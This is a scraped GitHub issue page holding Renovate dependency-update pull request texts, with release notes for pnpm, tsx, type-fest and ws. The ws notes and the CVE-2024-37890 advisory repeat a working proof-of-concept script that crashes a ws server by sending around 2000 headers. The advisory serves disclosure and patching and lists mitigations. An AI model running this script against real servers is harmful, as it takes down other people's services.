### [`v9.4.0`](https://togithub.com/pnpm/pnpm/compare/v9.3.0...v9.4.0)

[Compare Source](https://togithub.com/pnpm/pnpm/compare/v9.3.0...v9.4.0)

</details>

<details>
<summary>privatenumber/tsx (tsx)</summary>

### [`v4.15.6`](https://togithub.com/privatenumber/tsx/releases/tag/v4.15.6)

[Compare Source](https://togithub.com/privatenumber/tsx/compare/v4.15.5...v4.15.6)

##### Bug Fixes

-   minimum Node version in warning for `module.register()` ([#&#8203;592](https://togithub.com/privatenumber/tsx/issues/592)) ([cb27d4d](https://togithub.com/privatenumber/tsx/commit/cb27d4dfe7670e6cf50f09b48cbd37ac73aa064a))

***

This release is also available on:

-   [npm package (@&#8203;latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.6)

### [`v4.15.5`](https://togithub.com/privatenumber/tsx/releases/tag/v4.15.5)

[Compare Source](https://togithub.com/privatenumber/tsx/compare/v4.15.4...v4.15.5)

##### Bug Fixes

-   **cjs:** make transformers overwritable ([c22fa7d](https://togithub.com/privatenumber/tsx/commit/c22fa7d1a90fa34983caddda91b5c1c10e1a4b6c))

***

This release is also available on:

-   [npm package (@&#8203;latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.5)

</details>

<details>
<summary>sindresorhus/type-fest (type-fest)</summary>

### [`v4.20.1`](https://togithub.com/sindresorhus/type-fest/releases/tag/v4.20.1)

[Compare Source](https://togithub.com/sindresorhus/type-fest/compare/v4.20.0...v4.20.1)

-   `Schema`: Fix handling of arrays ([#&#8203;887](https://togithub.com/sindresorhus/type-fest/issues/887))  [`c570ec2`](https://togithub.com/sindresorhus/type-fest/commit/c570ec2)
-   `Paths`: Prevent infinite recursion ([#&#8203;891](https://togithub.com/sindresorhus/type-fest/issues/891))  [`7d4e875`](https://togithub.com/sindresorhus/type-fest/commit/7d4e875)

</details>

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "before 4am on Monday,before 4am on Thursday" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/weareinreach/TransMascFutures).



PR-URL: #436
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
MarcWils added a commit to MarcWils/VECOZO-OpenAPI that referenced this issue Jun 20, 2024
MarcWils added a commit to MarcWils/VECOZO-OpenAPI that referenced this issue Jun 20, 2024
chinthliss added a commit to chinthliss/MuckWebInterface that referenced this issue Jun 25, 2024
github-merge-queue bot referenced this issue in camunda/camunda Aug 9, 2024
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` ->
`8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

### GitHub Vulnerability Alerts

####
[CVE-2024-37890](https://togithub.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q)

### Impact

A request with a number of headers exceeding
the[`server.maxHeadersCount`][] threshold could be used to crash a ws
server.

### Proof of concept

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

### Patches

The vulnerability was fixed in [email protected]
(websockets/ws@e55e510)
and backported to [email protected]
(websockets/ws@22c2876),
[email protected]
(websockets/ws@eeb76d3),
and [email protected]
(websockets/ws@4abd8f6)

### Workarounds

In vulnerable versions of ws, the issue can be mitigated in the
following ways:

1. Reduce the maximum allowed length of the request headers using the
[`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options
so that no more headers than the `server.maxHeadersCount` limit can be
sent.
2. Set `server.maxHeadersCount` to `0` so that no limit is applied.

### Credits

The vulnerability was reported by [Ryan
LaPointe](https://togithub.com/rrlapointe) in
[https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

### References

-
[https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230)
-
[https://github.com/websockets/ws/pull/2231](https://togithub.com/websockets/ws/pull/2231)

[`--max-http-header-size=size`]:
https://nodejs.org/api/cli.html#--max-http-header-sizesize
[`maxHeaderSize`]:
https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener
[`server.maxHeadersCount`]:
https://nodejs.org/api/http.html#servermaxheaderscount

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare
Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

- Fixed a DoS vulnerability
([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding
the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan
LaPointe](https://togithub.com/rrlapointe) in
[https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the
following ways:

1.  Reduce the maximum allowed length of the request headers using the
[`--max-http-header-size=size`][--max-http-header-size=size] and/or the
[`maxHeaderSize`][maxHeaderSize] options so
that no more headers than the `server.maxHeadersCount` limit can be
sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]:
https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]:
https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]:
https://nodejs.org/api/http.html#servermaxheaderscount

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View the
[repository job log](https://developer.mend.io/github/camunda/camunda).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yMC4xIiwidXBkYXRlZEluVmVyIjoiMzguMjAuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiYXJlYS9zZWN1cml0eSIsImF1dG9tZXJnZSJdfQ==-->
@Maliksb11
Copy link

Ok

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants